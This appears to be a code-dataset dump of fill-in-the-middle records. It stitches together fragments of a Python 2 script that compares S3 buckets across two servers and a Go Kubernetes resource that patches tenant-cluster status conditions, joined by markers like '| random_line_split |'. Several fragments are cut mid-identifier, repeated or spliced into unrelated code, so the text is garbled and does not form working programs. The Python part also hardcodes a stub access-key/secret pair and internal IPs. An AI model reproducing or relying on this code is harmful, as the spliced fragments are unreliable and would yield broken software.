logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #标记外部流控
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
#部分错误结果的头域中没有包含x-amz-request-id,则从recvBody中获取
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if s3Request.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, s3Request.requestType, localAddr, peerAddr, s3Request.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(s3Request.bucket, s3Request.key, stack)
finally:
if not end_time: end_time = time.time()
#关闭连接:1.按服务端语义,若connection:close,则关闭连接。
if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
#关闭连接,让后续请求再新建连接。
logging.info('server inform to close connection')
myHTTPConnection.closeConnection()
#2.客户端感知的连接类错误,关闭连接。
elif not status <= '600':
logging.warning('caught exception, close connection')
#很可能是网络异常,关闭连接,让后续请求再新建连接。
myHTTPConnection.closeConnection()
time.sleep(.1)
#3.客户端配置了短连接
elif not myHTTPConnection.longConnection:
#python 2.7以下存在bug,不能直接使用close()方法关闭连接,不然客户端存在CLOSE_WAIT状态。
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
if __name__ == '__main__':
global MD5_Global_
printResult = time.time()
Service_1= '100.61.5.3'
Service_2 = '100.61.5.13'
#可以指定多个用户的AK,SK
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAMSTUBTEST000101',]
#server = '127.0.0.1', isSecure = False, timeout=80, serialNo = None, longConnection = False
server1_conn = s3PyCmd | if len(versions)>0 and len(versions) != len(keys):
logging.error('response error, versions != keys %s' %xmlBody)
return [] | random_line_split |
|
checkData.py | HTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(s3Request.requestType, localAddr, peerAddr, s3Request.url, s3Request.headers, s3Request.sendContent[0:1024]))
myHTTPConnection.connection.send(s3Request.sendContent)
waitResponseTimeStart = time.time()
#接收响应
httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
waitResponseTime = time.time() - waitResponseTimeStart
logging.debug('get response, wait time %.3f' %waitResponseTime)
#读取响应体
contentLength = int(httpResponse.getheader('Content-Length', '-1'))
logging.debug('get ContentLength: %d' %contentLength)
#区分不同的请求,对于成功响应的GetObject请求,需要特殊处理,否则一次读完body内容。
#需要考虑range下载,返回2xx均为正常请求。
recvBytes = 0
if (httpResponse.status < 300) and s3Request.requestType in ('GetObject'):
#同时满足条件,才校验数据内容。
#1.打开calMd5开关。2.GetObject操作;3.正确返回200响应(206不计算)
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
#要读完数据才算请求结束
end_time = time.time()
status = str(httpResponse.status) + ' ' + httpResponse.rea | #记日志、重定向(<400:debug; >=400,<500: warn; >=500:error)
if httpResponse.status < 400:
logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #标记外部流控
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
#部分错误结果的头域中没有包含x-amz-request-id,则从recvBody中获取
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if s3Request.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, s3Request.requestType, localAddr, peerAddr, s3Request.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(s3Request.bucket, s3Request.key, stack)
finally:
if not end_time: end_time = time.time()
#关闭连接:1.按服务端语义,若connection:close,则关闭连接。
if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
#关闭连接,让后续请求再新建连接。
logging.info('server inform to close connection')
myHTTPConnection.closeConnection()
#2.客户端感知的连接类错误,关闭连接。
elif not status <= '600':
logging.warning('caught exception, close connection')
#很可能是网络异常,关闭连接,让后续请求再新建连接。
myHTTPConnection.closeConnection()
time.sleep(.1)
#3.客户端配置了短连接
elif not myHTTPConnection.longConnection:
#python 2.7以下存在bug,不能直接使用close()方法关闭连接,不然客户端存在CLOSE_WAIT状态。
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
if __name__ == '__main__':
global MD5_Global_
printResult = time.time()
Service_1= '100.61.5.3'
Service_2 = '100.61.5.13'
#可以指定多个用户的AK,SK
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAMSTUBTEST000101',]
#server = '127.0.0.1', isSecure = False, timeout=80, serialNo = None, longConnection = False
server1_conn = s3PyCmd.MyHTTPConnection(host=Service_1, isSecure=False, timeout=600, serialNo=0, longConnection=False)
server2_conn = s3PyCmd.MyHTTPConnection(host=Service_2, isSecure=False, timeout=600, serialNo=0, longConnection=False)
totalObjectsOK = 0
totalObjectsErr = 0
totalReadErr = 0
userOK=True
for AKSK in User_AKSK:
print 'INFO: compare user %s' %AKSK
#列举用户所有桶
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListUserBuckets', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost = False, domainName = '', region='')
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Buckets_1 = make_request(s3Requesthandler1)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Buckets_2 = make_request(s3Requesthandler2)
#比较桶是否一致
Buckets_1 = getAllBucketsFromXML(Buckets_1)
Buckets_2 = getAllBucketsFromXML(Buckets_2)
logging.info('Buckets_1: %r, Buckets_2: %r' %(Buckets_1, Buckets_2))
print 'Buckets on Server1: %r, Buckets on Server2: %r' %(Buckets_1, Buckets_2)
Buckets = set(Buckets_1) & set(Buckets_2)
if not Buckets:
logging.error('find no same buckets exit')
print 'ERROR: no same buckets for this user'
break
open('Objects_1_List.txt','w').write('')
open('Objects_2_List.txt','w').write('')
#遍历桶
for bucket in | son
| conditional_block |
create.go | return microerror.Mask(err)
}
newObj, err := r.restClient.Get().AbsPath(accessor.GetSelfLink()).Do(ctx).Get()
if err != nil {
return microerror.Mask(err)
}
newAccessor, err := meta.Accessor(newObj)
if err != nil {
return microerror.Mask(err)
}
patches, err := r.computeCreateEventPatches(ctx, newObj)
if tenant.IsAPINotAvailable(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "tenant cluster is not available")
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling resource")
return nil
} else if err != nil {
return microerror.Mask(err)
}
if len(patches) > 0 {
err := r.applyPatches(ctx, newAccessor, patches)
if err != nil {
return microerror.Mask(err)
}
modified = true
}
return nil
}
b := r.backOffFactory()
n := func(err error, d time.Duration) {
r.logger.LogCtx(ctx, "level", "warning", "message", "retrying status patching due to error", "stack", fmt.Sprintf("%#v", err))
}
err := backoff.RetryNotify(o, b, n)
if err != nil {
return microerror.Mask(err)
}
}
if modified {
r.logger.LogCtx(ctx, "level", "debug", "message", "patched CR status")
reconciliationcanceledcontext.SetCanceled(ctx)
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling reconciliation")
} else {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not patch CR status")
}
return nil
}
func (r *Resource) computeCreateEventPatches(ctx context.Context, obj interface{}) ([]Patch, error) {
clusterStatus, err := r.clusterStatusFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentVersion := clusterStatus.LatestVersion()
desiredVersion, err := r.versionBundleVersionFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentNodeCount := len(clusterStatus.Nodes)
desiredNodeCount, err := r.nodeCountFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
var patches []Patch
// In case a CR might not have a status at all, we cannot work with it below.
// We have to initialize it upfront to be safe. Note that we only initialize
// fields that are managed by the statusresource library implementation. There
// might be other properties managed by external authorities who have to
// manage their own initialization.
patches = ensureDefaultPatches(clusterStatus, patches)
// After initialization the most likely implication is the tenant cluster being
// in a creation status. In case no other conditions are given and no nodes
// are known and no versions are set, we set the tenant cluster status to a
// creating condition.
{
notCreating := !clusterStatus.HasCreatingCondition()
conditionsEmpty := len(clusterStatus.Conditions) == 0
nodesEmpty := len(clusterStatus.Nodes) == 0
versionsEmpty := len(clusterStatus.Versions) == 0
if notCreating && conditionsEmpty && nodesEmpty && versionsEmpty {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreating))
}
}
// Once the tenant cluster is created we set the according status condition so
// the cluster status reflects the transitioning from creating to created.
{
isCreating := clusterStatus.HasCreatingCondition()
notCreated := !clusterStatus.HasCreatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isCreating && notCreated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreated))
}
}
// When we notice the current and the desired tenant cluster version differs,
// an update is about to be processed. So we set the status condition
// indicating the tenant cluster is updating now.
{
isCreated := clusterStatus.HasCreatedCondition()
notUpdating := !clusterStatus.HasUpdatingCondition()
versionDiffers := currentVersion != "" && currentVersion != desiredVersion
if isCreated && notUpdating && versionDiffers {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdating))
}
}
// Set the status cluster condition to updated when an update successfully
// took place. Precondition for this is the tenant cluster is updating and all
// nodes being known and all nodes having the same versions.
{
isUpdating := clusterStatus.HasUpdatingCondition()
notUpdated := !clusterStatus.HasUpdatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isUpdating && notUpdated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdated))
}
}
// Check all node versions held by the cluster status and add the version the
// tenant cluster successfully migrated to, to the historical list of versions.
{
hasTransitioned := clusterStatus.HasCreatedCondition() || clusterStatus.HasUpdatedCondition()
notSet := !clusterStatus.HasVersion(desiredVersion)
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if hasTransitioned && notSet && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/versions",
Value: clusterStatus.WithNewVersion(desiredVersion),
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status versions")
}
}
// Update the node status based on what the tenant cluster API tells us.
//
// TODO this is a workaround until we can read the node status information
// from the NodeConfig CR status. This is not possible right now because the
// NodeConfig CRs are still used for draining by older tenant clusters.
{
var k8sClient kubernetes.Interface
{
r.logger.LogCtx(ctx, "level", "debug", "message", "creating Kubernetes client for tenant cluster")
i, err := r.clusterIDFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
e, err := r.clusterEndpointFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
restConfig, err := r.tenantCluster.NewRestConfig(ctx, i, e)
if tenantcluster.IsTimeout(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not create Kubernetes client for tenant cluster")
r.logger.LogCtx(ctx, "level", "debug", "message", "waiting for certificates timed out")
} else if err != nil {
return nil, microerror.Mask(err)
}
clientsConfig := k8sclient.ClientsConfig{
Logger: r.logger | {
r.logger.LogCtx(ctx, "level", "debug", "message", "patching CR status")
// We process the status updates within its own backoff here to gurantee its
// execution independent of any eventual retries via the retry resource. It
// might happen that the reconciled object is not the latest version so any
// patch would fail. In case the patch fails we retry until we succeed. The
// steps of the backoff operation are as follows.
//
// Fetch latest version of runtime object.
// Compute patches for runtime object.
// Apply computed list of patches.
//
// In case there are no patches we do not need to do anything. So we prevent
// unnecessary API calls.
var modified bool
{
o := func() error {
accessor, err := meta.Accessor(obj)
if err != nil { | identifier_body |
|
create.go | version so any
// patch would fail. In case the patch fails we retry until we succeed. The
// steps of the backoff operation are as follows.
//
// Fetch latest version of runtime object.
// Compute patches for runtime object.
// Apply computed list of patches.
//
// In case there are no patches we do not need to do anything. So we prevent
// unnecessary API calls.
var modified bool
{
o := func() error {
accessor, err := meta.Accessor(obj)
if err != nil {
return microerror.Mask(err)
}
newObj, err := r.restClient.Get().AbsPath(accessor.GetSelfLink()).Do(ctx).Get()
if err != nil {
return microerror.Mask(err)
}
newAccessor, err := meta.Accessor(newObj)
if err != nil {
return microerror.Mask(err)
}
patches, err := r.computeCreateEventPatches(ctx, newObj)
if tenant.IsAPINotAvailable(err) | else if err != nil {
return microerror.Mask(err)
}
if len(patches) > 0 {
err := r.applyPatches(ctx, newAccessor, patches)
if err != nil {
return microerror.Mask(err)
}
modified = true
}
return nil
}
b := r.backOffFactory()
n := func(err error, d time.Duration) {
r.logger.LogCtx(ctx, "level", "warning", "message", "retrying status patching due to error", "stack", fmt.Sprintf("%#v", err))
}
err := backoff.RetryNotify(o, b, n)
if err != nil {
return microerror.Mask(err)
}
}
if modified {
r.logger.LogCtx(ctx, "level", "debug", "message", "patched CR status")
reconciliationcanceledcontext.SetCanceled(ctx)
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling reconciliation")
} else {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not patch CR status")
}
return nil
}
func (r *Resource) computeCreateEventPatches(ctx context.Context, obj interface{}) ([]Patch, error) {
clusterStatus, err := r.clusterStatusFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentVersion := clusterStatus.LatestVersion()
desiredVersion, err := r.versionBundleVersionFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentNodeCount := len(clusterStatus.Nodes)
desiredNodeCount, err := r.nodeCountFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
var patches []Patch
// In case a CR might not have a status at all, we cannot work with it below.
// We have to initialize it upfront to be safe. Note that we only initialize
// fields that are managed by the statusresource library implementation. There
// might be other properties managed by external authorities who have to
// manage their own initialization.
patches = ensureDefaultPatches(clusterStatus, patches)
// After initialization the most likely implication is the tenant cluster being
// in a creation status. In case no other conditions are given and no nodes
// are known and no versions are set, we set the tenant cluster status to a
// creating condition.
{
notCreating := !clusterStatus.HasCreatingCondition()
conditionsEmpty := len(clusterStatus.Conditions) == 0
nodesEmpty := len(clusterStatus.Nodes) == 0
versionsEmpty := len(clusterStatus.Versions) == 0
if notCreating && conditionsEmpty && nodesEmpty && versionsEmpty {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreating))
}
}
// Once the tenant cluster is created we set the according status condition so
// the cluster status reflects the transitioning from creating to created.
{
isCreating := clusterStatus.HasCreatingCondition()
notCreated := !clusterStatus.HasCreatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isCreating && notCreated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreated))
}
}
// When we notice the current and the desired tenant cluster version differs,
// an update is about to be processed. So we set the status condition
// indicating the tenant cluster is updating now.
{
isCreated := clusterStatus.HasCreatedCondition()
notUpdating := !clusterStatus.HasUpdatingCondition()
versionDiffers := currentVersion != "" && currentVersion != desiredVersion
if isCreated && notUpdating && versionDiffers {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdating))
}
}
// Set the status cluster condition to updated when an update successfully
// took place. Precondition for this is the tenant cluster is updating and all
// nodes being known and all nodes having the same versions.
{
isUpdating := clusterStatus.HasUpdatingCondition()
notUpdated := !clusterStatus.HasUpdatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isUpdating && notUpdated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdated))
}
}
// Check all node versions held by the cluster status and add the version the
// tenant cluster successfully migrated to, to the historical list of versions.
{
hasTransitioned := clusterStatus.HasCreatedCondition() || clusterStatus.HasUpdatedCondition()
notSet := !clusterStatus.HasVersion(desiredVersion)
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if hasTransitioned && notSet && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/versions",
Value: clusterStatus.WithNewVersion(desiredVersion),
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status versions")
}
}
// Update the node status based on what the tenant cluster API tells us.
//
// TODO this is a workaround until we can read the node status information
// from the NodeConfig CR status. This is not possible right now because the
// NodeConfig CRs are still used for draining by older tenant clusters.
{
var k8sClient kubernetes.Interface
{
r.logger.LogCtx(ctx, "level", "debug", "message", "creating Kubernetes client for tenant cluster")
i, err := r.clusterIDFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
e, err := r.clusterEndpointFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
restConfig, err := r.tenantCluster.NewRestConfig(ctx, i, e)
if tenantcluster.IsTimeout(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not create Kubernetes client for tenant cluster")
r.logger.LogCtx(ctx, "level", "debug", "message", "waiting for certificates timed out")
} else if err != nil {
return nil, microerror.Mask(err)
}
clientsConfig := k8sclient.ClientsConfig{
Logger: r.logger,
RestConfig: restConfig,
}
k8sClients, err := k8sclient.NewClients(clientsConfig)
if tenant.IsAPINotAvailable(err) || k8sclient.IsTimeout(err) {
r.logger.Debugf(ctx, "did not create Kubernetes client for tenant cluster, api is | {
r.logger.LogCtx(ctx, "level", "debug", "message", "tenant cluster is not available")
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling resource")
return nil
} | conditional_block |
create.go | latest version so any
// patch would fail. In case the patch fails we retry until we succeed. The
// steps of the backoff operation are as follows.
//
// Fetch latest version of runtime object.
// Compute patches for runtime object.
// Apply computed list of patches.
//
// In case there are no patches we do not need to do anything. So we prevent
// unnecessary API calls.
var modified bool
{
o := func() error {
accessor, err := meta.Accessor(obj)
if err != nil {
return microerror.Mask(err)
}
newObj, err := r.restClient.Get().AbsPath(accessor.GetSelfLink()).Do(ctx).Get()
if err != nil {
return microerror.Mask(err)
}
newAccessor, err := meta.Accessor(newObj)
if err != nil {
return microerror.Mask(err)
}
patches, err := r.computeCreateEventPatches(ctx, newObj)
if tenant.IsAPINotAvailable(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "tenant cluster is not available")
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling resource")
return nil
} else if err != nil {
return microerror.Mask(err)
}
if len(patches) > 0 {
err := r.applyPatches(ctx, newAccessor, patches)
if err != nil {
return microerror.Mask(err)
}
modified = true
}
return nil
}
b := r.backOffFactory()
n := func(err error, d time.Duration) {
r.logger.LogCtx(ctx, "level", "warning", "message", "retrying status patching due to error", "stack", fmt.Sprintf("%#v", err))
}
err := backoff.RetryNotify(o, b, n)
if err != nil {
return microerror.Mask(err)
}
}
if modified {
r.logger.LogCtx(ctx, "level", "debug", "message", "patched CR status")
reconciliationcanceledcontext.SetCanceled(ctx)
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling reconciliation")
} else {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not patch CR status")
}
return nil
}
func (r *Resource) computeCreateEventPatches(ctx context.Context, obj interface{}) ([]Patch, error) {
clusterStatus, err := r.clusterStatusFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentVersion := clusterStatus.LatestVersion()
desiredVersion, err := r.versionBundleVersionFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentNodeCount := len(clusterStatus.Nodes)
desiredNodeCount, err := r.nodeCountFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
var patches []Patch
// In case a CR might not have a status at all, we cannot work with it below.
// We have to initialize it upfront to be safe. Note that we only initialize
// fields that are managed by the statusresource library implementation. There
// might be other properties managed by external authorities who have to
// manage their own initialization.
patches = ensureDefaultPatches(clusterStatus, patches)
// After initialization the most likely implication is the tenant cluster being
// in a creation status. In case no other conditions are given and no nodes
// are known and no versions are set, we set the tenant cluster status to a
// creating condition.
{
notCreating := !clusterStatus.HasCreatingCondition()
conditionsEmpty := len(clusterStatus.Conditions) == 0
nodesEmpty := len(clusterStatus.Nodes) == 0
versionsEmpty := len(clusterStatus.Versions) == 0
if notCreating && conditionsEmpty && nodesEmpty && versionsEmpty {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreating))
}
}
// Once the tenant cluster is created we set the according status condition so
// the cluster status reflects the transitioning from creating to created.
{
isCreating := clusterStatus.HasCreatingCondition()
notCreated := !clusterStatus.HasCreatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isCreating && notCreated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreated))
}
}
// When we notice the current and the desired tenant cluster version differs,
// an update is about to be processed. So we set the status condition
// indicating the tenant cluster is updating now.
{
isCreated := clusterStatus.HasCreatedCondition()
notUpdating := !clusterStatus.HasUpdatingCondition()
versionDiffers := currentVersion != "" && currentVersion != desiredVersion
if isCreated && notUpdating && versionDiffers {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdating))
}
}
// Set the status cluster condition to updated when an update successfully
// took place. Precondition for this is the tenant cluster is updating and all
// nodes being known and all nodes having the same versions.
{
isUpdating := clusterStatus.HasUpdatingCondition()
notUpdated := !clusterStatus.HasUpdatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isUpdating && notUpdated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdated))
}
}
// Check all node versions held by the cluster status and add the version the
// tenant cluster successfully migrated to, to the historical list of versions.
{
hasTransitioned := clusterStatus.HasCreatedCondition() || clusterStatus.HasUpdatedCondition()
notSet := !clusterStatus.HasVersion(desiredVersion)
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if hasTransitioned && notSet && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/versions",
Value: clusterStatus.WithNewVersion(desiredVersion),
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status versions")
} | }
// Update the node status based on what the tenant cluster API tells us.
//
// TODO this is a workaround until we can read the node status information
// from the NodeConfig CR status. This is not possible right now because the
// NodeConfig CRs are still used for draining by older tenant clusters.
{
var k8sClient kubernetes.Interface
{
r.logger.LogCtx(ctx, "level", "debug", "message", "creating Kubernetes client for tenant cluster")
i, err := r.clusterIDFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
e, err := r.clusterEndpointFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
restConfig, err := r.tenantCluster.NewRestConfig(ctx, i, e)
if tenantcluster.IsTimeout(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not create Kubernetes client for tenant cluster")
r.logger.LogCtx(ctx, "level", "debug", "message", "waiting for certificates timed out")
} else if err != nil {
return nil, microerror.Mask(err)
}
clientsConfig := k8sclient.ClientsConfig{
Logger: r.logger,
RestConfig: restConfig,
}
k8sClients, err := k8sclient.NewClients(clientsConfig)
if tenant.IsAPINotAvailable(err) || k8sclient.IsTimeout(err) {
r.logger.Debugf(ctx, "did not create Kubernetes client for tenant cluster, api is | random_line_split |
|
create.go | (ctx context.Context, obj interface{}) error {
r.logger.LogCtx(ctx, "level", "debug", "message", "patching CR status")
// We process the status updates within its own backoff here to gurantee its
// execution independent of any eventual retries via the retry resource. It
// might happen that the reconciled object is not the latest version so any
// patch would fail. In case the patch fails we retry until we succeed. The
// steps of the backoff operation are as follows.
//
// Fetch latest version of runtime object.
// Compute patches for runtime object.
// Apply computed list of patches.
//
// In case there are no patches we do not need to do anything. So we prevent
// unnecessary API calls.
var modified bool
{
o := func() error {
accessor, err := meta.Accessor(obj)
if err != nil {
return microerror.Mask(err)
}
newObj, err := r.restClient.Get().AbsPath(accessor.GetSelfLink()).Do(ctx).Get()
if err != nil {
return microerror.Mask(err)
}
newAccessor, err := meta.Accessor(newObj)
if err != nil {
return microerror.Mask(err)
}
patches, err := r.computeCreateEventPatches(ctx, newObj)
if tenant.IsAPINotAvailable(err) {
